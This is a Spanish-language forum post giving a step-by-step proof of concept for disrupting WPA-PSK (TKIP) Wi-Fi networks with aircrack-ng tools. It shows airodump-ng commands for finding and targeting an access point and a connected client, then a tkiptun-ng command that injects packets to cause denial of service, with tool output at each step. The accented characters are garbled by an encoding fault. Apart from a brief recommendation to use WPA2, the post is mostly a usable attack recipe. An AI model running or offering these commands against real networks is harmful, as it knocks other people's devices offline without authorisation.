PoC DoS en redes Wifi WPA-PSK (TKIP)

Publicado por D3M0N, 18 de Febrero de 2011, 10:16:00 AM

Tema anterior - Siguiente tema

badder y 1 Visitante están viendo este tema.

D3M0N

Con el objetivo de desasociar un equipo con su correspondiente punto de acceso en redes con WPA es posible inyectar trí¡fico provocando una denegaciín de servicio (DoS) en el AP y así­ conseguir desasociar el resto de equipos conectados.

En este artí­culo se va a mostrar una prueba de concepto de címo romper el protocolo TKIP en las redes Wi-Fi, WPA-PSK. Para ello, se va a utilizar la suite de herramientas de seguridad de redes Wi-Fi, aircrack-ng. A travís de este ataque no es posible recuperar la contraseíña pero si es posible generar una denegaciín de servicio en la red. Para su logro, es necesario que el punto de acceso tenga habilitado el servicio QoS, y que haya un cliente asociado a la red.

El protocolo TKIP (Temporal Key Integrity Protocol) se emplea en las redes Wi-Fi, WPA-PSK. Su objetivo es mejorar el sistema de cifrado de la clave de la red. En principio, fue diseíñado para sustituir el sistema de cifrado WEP sin necesidad de actualizar el hardware. íšnicamente era necesario actualizar el firmware. WPA2 mejora las caracterí­sticas de seguridad de WPA. Por ello es recomendable emplear el sistema de cifrado WPA2 para proteger las redes Wi-Fi. Antes de comenzar, es necesario configurar la tarjeta de red Wi-Fi en modo “Monitor”. En primer lugar, hay que localizar el objetivo:

$ airodump-ng ath1 
ath1 â€" interfaz de red Wi-Fi ath1


Cita de: PASOCH 7 ][ BAT: 1 hour 54 mins ][ Elapsed: 4 s ][ 2010-01-04 20:24
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:D2:15:01:BC 2 3 0 0 11 54e WPA TKIP PSK Vodafone01BB
00:60:B3:F4:14:31 26 13 0 0 7 54 . WPA TKIP PSK fastbreak
00:14:C1:38:F5:13 43 7 0 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes

Una vez que se ha detectado el objetivo hay que ponerle cerco. Para ello:

$ airodump-ng ath1 --bssid 00:14:C1:38:F5:13 --channel 11 
ath1 â€" Interfaz de red Wi-Fi ath1

--bssid â€" direcciín MAC del punto de acceso.
--channel â€" Canal en el que emite el punto de acceso.


Cita de: PASO2CH 11 ][ BAT: 2 hours 12 mins ][ Elapsed: 1 min ][ 2010-01-04 20:01 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 46 100 883 10 0 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 26 1e-54e 0 11

Ahora es el momento de lanzar el ataque. En otro terminal:

$ tkiptun-ng ath1 -a 00:14:C1:38:F5:13 -e hacktimes -h 00:C0:A8:E6:68:97 -x 1024
ath1 â€" Interfaz de red Wi-Fi ath1

-a â€" direcciín MAC del punto de acceso.
-e â€" ESSID de la red Wi-Fi.
-h â€" direcciín MAC del cliente asociado.
-x 1024 â€" Inyectar 1024 paquetes por segundo.


CitarThe interface MAC (00:15:6D:54:0C:70) doesn't match the specified MAC (-h).
ifconfig ath1 hw ether 00:C0:A8:E6:68:97
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
20:02:06 Michael Test: Successful
20:02:06 Waiting for beacon frame (BSSID: 00:14:C1:38:F5:13) on channel 11
20:02:06 Found specified AP
20:02:06 WPA handshake: 00:14:C1:38:F5:13 capturedA8:E6:68:97] [ 0| 0 ACKs]

20:02:07 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0104-200233.cap
20:02:33 Got the answer!
20:02:33 Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.

Sent 1127089 packets, current guess: 8E...

Al volver al terminal anterior se observa la inyecciín de paquetes, lo que permitirí¡ provocar la denegaciín de servicio:

CitarCH 11 ][ BAT: 1 hour 35 mins ][ Elapsed: 21 mins ][ 2010-01-04 20:23 ][ WPA handshake: 00:14:C1:38:F5:13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:C1:38:F5:13 35 100 11929 81283 65 11 54e WPA TKIP PSK hacktimes
BSSID STATION PWR Rate Lost Packets Probes
00:14:C1:38:F5:13 00:C0:A8:E6:68:97 29 1e-54e 0 81303